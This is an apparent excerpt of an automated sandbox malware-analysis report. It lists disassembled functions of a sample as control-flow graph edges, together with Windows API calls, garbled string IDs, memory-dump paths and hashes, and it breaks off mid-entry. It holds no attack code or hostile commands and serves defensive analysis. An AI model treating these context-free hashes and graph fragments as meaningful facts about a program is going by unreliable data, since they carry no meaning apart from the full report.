                                    control_flow_graph 2743 85c8240-85c82a4 2749 85c82aa-85c82b7 2743->2749 2750 85c8352-85c8362 2743->2750 2749->2750 2751 85c82bd-85c82ca 2749->2751 2751->2750 2752 85c82d0-85c82dd 2751->2752 2752->2750 2754 85c82df-85c82ec 2752->2754 2754->2750 2755 85c82ee-85c82fb 2754->2755 2755->2750 2756 85c82fd-85c830a 2755->2756 2756->2750 2757 85c830c-85c8319 2756->2757 2757->2750 2758 85c831b-85c8351 call 85c7280 2757->2758
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LR]q$U$$]q$$]q
                                    • API String ID: 0-3846951357
                                    • Opcode ID: 555680dad41860e7cbc7506f35ca4543a8f616662732fa469bb792aef3a1bf6e
                                    • Instruction ID: bb0c22ea51472c717f68af55864eb5a6c41a07c7d18c1b2082ad1d1b0f7aa381
                                    • Opcode Fuzzy Hash: 555680dad41860e7cbc7506f35ca4543a8f616662732fa469bb792aef3a1bf6e
                                    • Instruction Fuzzy Hash: 1D310270901208DFCB14DFA8D588A9DBBF1FF04706F18D5ADD0196B622D735DA88CB45
                                    Function 085C7B4C Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2930 85c7b4c 2931 85c7b4d-85c7b78 2930->2931 2934 85c7b7a-85c7b83 2931->2934 2935 85c7b9b 2931->2935 2937 85c7b8a-85c7b97 2934->2937 2938 85c7b85-85c7b88 2934->2938 2936 85c7b9e-85c7c02 2935->2936 2946 85c7c1a 2936->2946 2947 85c7c04-85c7c0a 2936->2947 2939 85c7b99 2937->2939 2938->2939 2939->2936 2948 85c7c1d-85c7c24 2946->2948 2949 85c7c0c 2947->2949 2950 85c7c0e-85c7c10 2947->2950 2951 85c7de9-85c7df9 2948->2951 2952 85c7c2a-85c7c36 2948->2952 2949->2946 2950->2946 2961 85c7dfb-85c7e05 2951->2961 2962 85c7e57-85c7e59 2951->2962 2952->2931 2954 85c7b3d 2952->2954 2954->2931 2954->2948 2956 85c7cde-85c7ce3 2954->2956 2957 85c7ce8-85c7cfb 2954->2957 2958 85c7c3b-85c7c3f 2954->2958 2959 85c7dbb-85c7dd0 2954->2959 2960 85c7db1-85c7db6 2954->2960 3048 85c7d00 call 85cc4e4 2957->3048 3049 85c7d00 call 85cd870 2957->3049 3050 85c7d00 call 85cd880 2957->3050 2963 85c7c41-85c7c4a 2958->2963 2964 85c7c62 2958->2964 3046 85c7dd2 call 85cf019 2959->3046 3047 85c7dd2 call 85cf030 2959->3047 2967 85c7e07-85c7e0d 2961->2967 2968 85c7e63-85c7e65 2961->2968 2965 85c7e5b-85c7e61 2962->2965 2966 85c7eb7 2962->2966 2969 85c7c4c-85c7c4f 2963->2969 2970 85c7c51-85c7c5e 2963->2970 2977 85c7c65-85c7cc3 2964->2977 2965->2968 2971 85c7ebf-85c7ec2 2965->2971 2972 85c7e99 2966->2972 2975 85c7e0f-85c7e11 2967->2975 2976 85c7e6b-85c7e6d 2967->2976 2973 85c7e67-85c7e6a 2968->2973 2974 85c7ec3-85c7ec7 2968->2974 2980 85c7c60 2969->2980 2970->2980 2971->2974 2985 85c7e9b-85c7e9c 2972->2985 2973->2976 2982 85c7ec9 2974->2982 2983 85c7ed0-85c7ed5 2974->2983 2981 85c7e6f-85c7e8e 2975->2981 2984 85c7e13-85c7e31 2975->2984 2976->2981 3034 85c7cdb 2977->3034 3035 85c7cc5-85c7ccb 2977->3035 2980->2977 2992 85c7e8f 2981->2992 2993 85c7ece 2982->2993 2983->2993 2984->2992 2994 85c7e33-85c7e35 2984->2994 2986 85c7e9e 2985->2986 2987 85c7ea5-85c7ea6 2985->2987 2986->2987 2996 85c7efc-85c7f01 2986->2996 2997 85c7e9f-85c7ea1 2986->2997 2998 85c7eb9-85c7ebc 2986->2998 2999 85c7edb 2986->2999 3000 85c7ef5-85c7efa 2986->3000 3001 85c7ed7-85c7ed9 2986->3001 3002 85c7ee3-85c7ee8 2986->3002 3003 85c7ea7-85c7eae 2987->3003 2988 85c7d06 3044 85c7d08 call 85ce5b8 2988->3044 3045 85c7d08 call 85ce5a8 2988->3045 3004 85c7e93-85c7e95 2992->3004 2993->2972 2994->3004 3005 85c7e37-85c7e39 2994->3005 3006 85c7ea3-85c7ea4 2997->3006 2998->2971 2999->3002 3000->2972 3001->2972 3010 85c7f04-85c7f0e 3002->3010 3014 85c7eea-85c7ef3 3002->3014 3009 85c7eaf-85c7eb0 3003->3009 3003->3010 3012 85c7e97 3004->3012 3011 85c7e3b-85c7e3d 3005->3011 3005->3012 3006->2987 3007 85c7d0e-85c7d15 3016 85c7d38 3007->3016 3017 85c7d17-85c7d20 3007->3017 3008 85c7dd8 3020 85c7ddf-85c7de6 3008->3020 3009->2966 3011->2985 3015 85c7e3f-85c7e41 3011->3015 3012->2972 3014->2972 3015->2997 3022 85c7e43-85c7e45 3015->3022 3021 85c7d3b-85c7d9c 3016->3021 3018 85c7d27-85c7d34 3017->3018 3019 85c7d22-85c7d25 3017->3019 3026 85c7d36 3018->3026 3019->3026 3042 85c7da2-85c7dae 3021->3042 3022->3006 3025 85c7e47-85c7e49 3022->3025 3025->3003 3029 85c7e4b-85c7e51 3025->3029 3026->3021 3029->3009 3031 85c7e53-85c7e56 3029->3031 3031->2962 3034->2956 3037 85c7ccd 3035->3037 3038 85c7ccf-85c7cd1 3035->3038 3037->3034 3038->3034 3042->2960 3044->3007 3045->3007 3046->3008 3047->3008 3048->2988 3049->2988 3050->2988
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $]q$$]q
                                    • API String ID: 0-127220927
                                    • Opcode ID: 088f3c8b9e5472ddb454d591eb818878490255fd539040226e4739113073bf5a
                                    • Instruction ID: fdeee51f0f3d12f6b5a8b8e6373aec30e41abe5badccbb545a2cda56fac688e6
                                    • Opcode Fuzzy Hash: 088f3c8b9e5472ddb454d591eb818878490255fd539040226e4739113073bf5a
                                    • Instruction Fuzzy Hash: 56518634B40219DFDB149FB8D859BAD7BB2BB4C712F208429E902A7794DE749C41CF94
                                    Function 085C7B33 Relevance: 2.7, Strings: 2, Instructions: 175COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 3051 85c7b33 3052 85c7b38-85c7b3b 3051->3052 3053 85c7b4d-85c7b66 3052->3053 3054 85c7b3d 3052->3054 3073 85c7b71-85c7b78 3053->3073 3054->3053 3055 85c7c1d-85c7c24 3054->3055 3056 85c7cde-85c7ce3 3054->3056 3057 85c7ce8-85c7cfb 3054->3057 3058 85c7c3b-85c7c3f 3054->3058 3059 85c7dbb-85c7dd0 3054->3059 3060 85c7db1-85c7db6 3054->3060 3061 85c7de9-85c7df9 3055->3061 3062 85c7c2a-85c7c36 3055->3062 3165 85c7d00 call 85cc4e4 3057->3165 3166 85c7d00 call 85cd870 3057->3166 3167 85c7d00 call 85cd880 3057->3167 3063 85c7c41-85c7c4a 3058->3063 3064 85c7c62 3058->3064 3168 85c7dd2 call 85cf019 3059->3168 3169 85c7dd2 call 85cf030 3059->3169 3077 85c7dfb-85c7e05 3061->3077 3078 85c7e57-85c7e59 3061->3078 3062->3052 3066 85c7c4c-85c7c4f 3063->3066 3067 85c7c51-85c7c5e 3063->3067 3068 85c7c65-85c7cc3 3064->3068 3071 85c7c60 3066->3071 3067->3071 3147 85c7cdb 3068->3147 3148 85c7cc5-85c7ccb 3068->3148 3071->3068 3079 85c7b7a-85c7b83 3073->3079 3080 85c7b9b 3073->3080 3074 85c7d06 3170 85c7d08 call 85ce5b8 3074->3170 3171 85c7d08 call 85ce5a8 3074->3171 3085 85c7e07-85c7e0d 3077->3085 3086 85c7e63-85c7e65 3077->3086 3083 85c7e5b-85c7e61 3078->3083 3084 85c7eb7 3078->3084 3087 85c7b8a-85c7b97 3079->3087 3088 85c7b85-85c7b88 3079->3088 3082 85c7b9e-85c7c02 3080->3082 3157 85c7c1a 3082->3157 3158 85c7c04-85c7c0a 3082->3158 3083->3086 3092 85c7ebf-85c7ec2 3083->3092 3093 85c7e99 3084->3093 3096 85c7e0f-85c7e11 3085->3096 3097 85c7e6b-85c7e6d 3085->3097 3094 85c7e67-85c7e6a 3086->3094 3095 85c7ec3-85c7ec7 3086->3095 3098 85c7b99 3087->3098 3088->3098 3090 85c7d0e-85c7d15 3099 85c7d38 3090->3099 3100 85c7d17-85c7d20 3090->3100 3091 85c7dd8 3113 85c7ddf-85c7de6 3091->3113 3092->3095 3106 85c7e9b-85c7e9c 3093->3106 3094->3097 3103 85c7ec9 3095->3103 3104 85c7ed0-85c7ed5 3095->3104 3102 85c7e6f-85c7e8e 3096->3102 3105 85c7e13-85c7e31 3096->3105 3097->3102 3098->3082 3115 85c7d3b-85c7d9c 3099->3115 3111 85c7d27-85c7d34 3100->3111 3112 85c7d22-85c7d25 3100->3112 3116 85c7e8f 3102->3116 3117 85c7ece 3103->3117 3104->3117 3105->3116 3118 85c7e33-85c7e35 3105->3118 3108 85c7e9e 3106->3108 3109 85c7ea5-85c7ea6 3106->3109 3108->3109 3119 85c7efc-85c7f01 3108->3119 3120 85c7e9f-85c7ea1 3108->3120 3121 85c7eb9-85c7ebc 3108->3121 3122 85c7edb 3108->3122 3123 85c7ef5-85c7efa 3108->3123 3124 85c7ed7-85c7ed9 3108->3124 3125 85c7ee3-85c7ee8 3108->3125 3126 85c7ea7-85c7eae 3109->3126 3127 85c7d36 3111->3127 3112->3127 3163 85c7da2-85c7dae 3115->3163 3129 85c7e93-85c7e95 3116->3129 3117->3093 3118->3129 3130 85c7e37-85c7e39 3118->3130 3131 85c7ea3-85c7ea4 3120->3131 3121->3092 3122->3125 3123->3093 3124->3093 3133 85c7f04-85c7f0e 3125->3133 3138 85c7eea-85c7ef3 3125->3138 3132 85c7eaf-85c7eb0 3126->3132 3126->3133 3127->3115 3137 85c7e97 3129->3137 3136 85c7e3b-85c7e3d 3130->3136 3130->3137 3131->3109 3132->3084 3136->3106 3140 85c7e3f-85c7e41 3136->3140 3137->3093 3138->3093 3140->3120 3143 85c7e43-85c7e45 3140->3143 3143->3131 3146 85c7e47-85c7e49 3143->3146 3146->3126 3151 85c7e4b-85c7e51 3146->3151 3147->3056 3152 85c7ccd 3148->3152 3153 85c7ccf-85c7cd1 3148->3153 3151->3132 3154 85c7e53-85c7e56 3151->3154 3152->3147 3153->3147 3154->3078 3157->3055 3159 85c7c0c 3158->3159 3160 85c7c0e-85c7c10 3158->3160 3159->3157 3160->3157 3163->3060 3165->3074 3166->3074 3167->3074 3168->3091 3169->3091 3170->3090 3171->3090
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $]q$$]q
                                    • API String ID: 0-127220927
                                    • Opcode ID: 371b3c16d7955df2eb8e918a9f84cc19b86e48d1a7599707be653f21c430155d
                                    • Instruction ID: 483a46d5929b6dec690269c08c10d7d6c3d627f5a28056bcd6ba287b51ca8989
                                    • Opcode Fuzzy Hash: 371b3c16d7955df2eb8e918a9f84cc19b86e48d1a7599707be653f21c430155d
                                    • Instruction Fuzzy Hash: C9519534B40219DFDB148FB8D459BAD7BB2BB8C711F208429E902A7780DE749C41CFA4
                                    Function 0133B1F0 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0133B446
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050378660.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: d46a343fee073827518d574cb28242c92f4fd7b5ed566acbc602b8d84b8640e6
                                    • Instruction ID: 62375047e396067cd4c3d72687c885836828d734ddce057b91d0b45fced2b24c
                                    • Opcode Fuzzy Hash: d46a343fee073827518d574cb28242c92f4fd7b5ed566acbc602b8d84b8640e6
                                    • Instruction Fuzzy Hash: F6814470A00B458FDB24DF6AD0407AABBF5FF88304F008A2DD48ADBA54D775E949CB95
                                    Function 05581CE4 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05581E02
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2060061163.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5580000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    • String ID:
                                    • API String ID: 716092398-0
                                    • Opcode ID: 338d3c96db543e2d05204d7538645e6d49e892f04d238cd23b3ccd32ce734a57
                                    • Instruction ID: 29855df65df1b916974719c3e0e1e948b7d0df3a7ae0d09d6e24c0d47160887d
                                    • Opcode Fuzzy Hash: 338d3c96db543e2d05204d7538645e6d49e892f04d238cd23b3ccd32ce734a57
                                    • Instruction Fuzzy Hash: 2851C1B1D10749AFDB14DFA9C884ADEBFB5BF48310F24812AE819AB210D7759885CF91
                                    Function 05581CF0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05581E02
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2060061163.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5580000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    • String ID:
                                    • API String ID: 716092398-0
                                    • Opcode ID: af797a426fc25e9e3f0efacd4e9ef28f5399fafce67481fb41bec78b2d9c288c
                                    • Instruction ID: cf5792593edb39f9e5820cddd169936f90e719590a59993b253712d9e4ece976
                                    • Opcode Fuzzy Hash: af797a426fc25e9e3f0efacd4e9ef28f5399fafce67481fb41bec78b2d9c288c
                                    • Instruction Fuzzy Hash: 3641C0B1D007499FDB14DFA9C884ADEBFB5BF48310F24812AE819AB250D774A885CF90
                                    Function 01335E84 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 01335F41
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050378660.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: 056fe54aa7c5a4c9fe40c8d41ef51cf85091f17379c2c4a53c54f64be177663d
                                    • Instruction ID: 942ae7eb6fa6cf2585361db43cad1428d87aea2cb53f63e8204e0c2bfa90611a
                                    • Opcode Fuzzy Hash: 056fe54aa7c5a4c9fe40c8d41ef51cf85091f17379c2c4a53c54f64be177663d
                                    • Instruction Fuzzy Hash: 2D41E2B0C0071DCEDB24DFA9C944BDDBBB5BF89308F20846AD408AB255DB75694ACF91
                                    Function 05580BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                    Download Yara Rule
                                    APIs
                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 05584381
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2060061163.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5580000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: CallProcWindow
                                    • String ID:
                                    • API String ID: 2714655100-0
                                    • Opcode ID: 2b169f9279e89309b6e6a2351c5de4f16224c195950c72b991208803079314c3
                                    • Instruction ID: e08582b24d1f35c5c5b0589defc1ebee7198d3b8a0649ed0269b69b2e4d07e70
                                    • Opcode Fuzzy Hash: 2b169f9279e89309b6e6a2351c5de4f16224c195950c72b991208803079314c3
                                    • Instruction Fuzzy Hash: 434129B4900249CFCB14DF99C448AAEFBF5FF88314F25C859D919AB321D774A841CBA0
                                    Function 0133450C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 01335F41
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050378660.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: e1e7690c8a84da532af00de5a6842c5043f34ca7a3e179ed95b0143f4ad22cbb
                                    • Instruction ID: f1189833cdbad34e904f9a7d8c0337f5abbdf30b0917f18b30af65eb7e49bc50
                                    • Opcode Fuzzy Hash: e1e7690c8a84da532af00de5a6842c5043f34ca7a3e179ed95b0143f4ad22cbb
                                    • Instruction Fuzzy Hash: F441D2B0C0071DCBDB24DFA9C844B9DBBF6BF89304F20846AD408AB255DB756949CF91
                                    Function 0133D6B8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                    Download Yara Rule
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0133D747
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050378660.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: 6851ed883ca641cac3104dce7ff049282580373c052e2b5efaaa5ffb09636851
                                    • Instruction ID: 9336dd257c17a4fa3d9767618d519474d65ef2ed5704676aa108ada2ccc72c65
                                    • Opcode Fuzzy Hash: 6851ed883ca641cac3104dce7ff049282580373c052e2b5efaaa5ffb09636851
                                    • Instruction Fuzzy Hash: 8E21E3B5D003489FDB10CFAAD584AEEBBF5FB49320F14801AE918A3250C379A944CF65
                                    Function 0133D6C0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                    Download Yara Rule
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0133D747
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050378660.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: 02e9c0545cabb1da2f770f5dac946988a36b0c80c9f192f5421d0a7f4e591f0f
                                    • Instruction ID: f62600849e419fa0434ba4a3ec4308bdf22d7f1b4b1291c289de6f87aae7f51d
                                    • Opcode Fuzzy Hash: 02e9c0545cabb1da2f770f5dac946988a36b0c80c9f192f5421d0a7f4e591f0f
                                    • Instruction Fuzzy Hash: CA21D3B59002489FDB10CFAAD984ADEFFF9FB48310F14841AE918A3350D378A944CFA5
                                    Function 0133B661 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0133B4C1,00000800,00000000,00000000), ref: 0133B6D2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050378660.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 81cb24926cf186426db665bd409210d4acbe49b513b13bb89b0638e4db6ce3cc
                                    • Instruction ID: f024bba23662763dd6dfb81e1abdd284b1fc0b895c39930cd96de7afaebc71ec
                                    • Opcode Fuzzy Hash: 81cb24926cf186426db665bd409210d4acbe49b513b13bb89b0638e4db6ce3cc
                                    • Instruction Fuzzy Hash: 312114B6C003498FDB10CF9AD444AEEFBF4EB89324F10842ED919A7210C379A945CFA5
                                    Function 0133AC20 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0133B4C1,00000800,00000000,00000000), ref: 0133B6D2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050378660.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 09fb0105db743a0a5c556c0367bbaac900adf90a32a38e4c7d7920e57deec973
                                    • Instruction ID: 9f0bff35672ba8ad9c48fd774451e461b59a5b6517ce545e67a9be37857e90d6
                                    • Opcode Fuzzy Hash: 09fb0105db743a0a5c556c0367bbaac900adf90a32a38e4c7d7920e57deec973
                                    • Instruction Fuzzy Hash: F21114B68003488FDB10DF9AD444B9EFBF4EB88324F10842AD519A7210C379A944CFA5
                                    Function 07F50408 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07F5993D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2062277673.0000000007F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07ED0000, based on PE: true
                                    • Associated: 00000000.00000002.2062036493.0000000007ED0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ed0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: MessagePost
                                    • String ID:
                                    • API String ID: 410705778-0
                                    • Opcode ID: 6ab927f87e9048a929ecfb8c7ae024412ceb1931610bd7b3c00ca3656f7383e4
                                    • Instruction ID: 7d9f8f7762486b6edeae94e8d97c574ba169ac1ed8a49ed4bf1e97dda533bc35
                                    • Opcode Fuzzy Hash: 6ab927f87e9048a929ecfb8c7ae024412ceb1931610bd7b3c00ca3656f7383e4
                                    • Instruction Fuzzy Hash: 591103B5800349DFDB10DF9AD449BDEBBF8FB49310F14841AEA18A7240C3B9A944CFA1
                                    Function 0133B3E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0133B446
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050378660.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1330000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: 0f6b24093d0cea32cebe1e68614fe44bafaab6df5263dfdbc9ca997f1745ed53
                                    • Instruction ID: c3c1185be481a2c45d305755bc40201136201b49c7a2622964cca2e9054fa84b
                                    • Opcode Fuzzy Hash: 0f6b24093d0cea32cebe1e68614fe44bafaab6df5263dfdbc9ca997f1745ed53
                                    • Instruction Fuzzy Hash: 2D11DFB6C006498FDB10DF9AD444B9EFBF4AF89314F10841AD519B7210C379A545CFA5
                                    Function 085C7694 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Te]q
                                    • API String ID: 0-52440209
                                    • Opcode ID: 4fb175650687600dfc019d4b029569132cae4fbcda3a02aec072f220cc94b153
                                    • Instruction ID: 9e7ed55e15590ca779237f729b6b3ed504a870946caccc63dd07847f4f192f42
                                    • Opcode Fuzzy Hash: 4fb175650687600dfc019d4b029569132cae4fbcda3a02aec072f220cc94b153
                                    • Instruction Fuzzy Hash: 1451B031B002068FCB15DBB9D88496FBBF6FFC5221715896DE459D7350EB309D068BA1
                                    Function 085C9EA9 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: r
                                    • API String ID: 0-621588783
                                    • Opcode ID: fe60aaed1ea682eb7b3fdc257ecaee4dce17cb653860c407abe2115ac98f8de8
                                    • Instruction ID: ebc4e2dd62f66b7399a864432f9be59e76a121e119b64e5d05af03a3a4ad0ae1
                                    • Opcode Fuzzy Hash: fe60aaed1ea682eb7b3fdc257ecaee4dce17cb653860c407abe2115ac98f8de8
                                    • Instruction Fuzzy Hash: F0319A71804289CFCB11CFA9C8806AAFFF5BF85312F14866EE569E7292D7349A11CF51
                                    Function 085CC251 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Te]q
                                    • API String ID: 0-52440209
                                    • Opcode ID: 9319c6eb944b88257967ec88703d2e7dd08967f9eaffb0e55ce36087f2171951
                                    • Instruction ID: 9823a5111f3813e6183ad3d75c6bf92ca39c4eab3d58d497585b95a5050169ff
                                    • Opcode Fuzzy Hash: 9319c6eb944b88257967ec88703d2e7dd08967f9eaffb0e55ce36087f2171951
                                    • Instruction Fuzzy Hash: B5115B72E0020A8FCB54EFE8D4416EEB7F6BF98652B14446DC049E7214EB358902DFA1
                                    Function 085CC260 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Te]q
                                    • API String ID: 0-52440209
                                    • Opcode ID: d58a439255699968d0cb7176f16f02b8b9f915163c62418ab8e2ed276a08b5b7
                                    • Instruction ID: adefb6476b4d81838a4872531bc7b452802932d605e6c1f5fa40d64a37d548e3
                                    • Opcode Fuzzy Hash: d58a439255699968d0cb7176f16f02b8b9f915163c62418ab8e2ed276a08b5b7
                                    • Instruction Fuzzy Hash: AB111C31F0020A8FCB54EFA999115EEB7F6BFC8651B60407DC50AE7244EB358E02DBA1
                                    Function 085C8920 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_85c0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: U
                                    • API String ID: 0-3372436214
                                    • Opcode ID: dcfa75870b5389d7f6db8b4f879905df975fe02788a46248a4a92a4ade959fb4
                                    • Instruction ID: 68041bde46bfb1ab68299719dd506f38e5a9cefabcc5751399d2726179d6d556
                                    • Opcode Fuzzy Hash: dcfa75870b5389d7f6db8b4f879905df975fe02788a46248a4a92a4ade959fb4
                                    • Instruction Fuzzy Hash: 3BE0CD30284349EFE7600F909C19F3536CDBB81B15F24457CED98595D1C7A15400CB06
                                    Function 085CEA28 Relevance: 1.3, Strings: 1, Instructions: 14COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063232605.00000000085C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
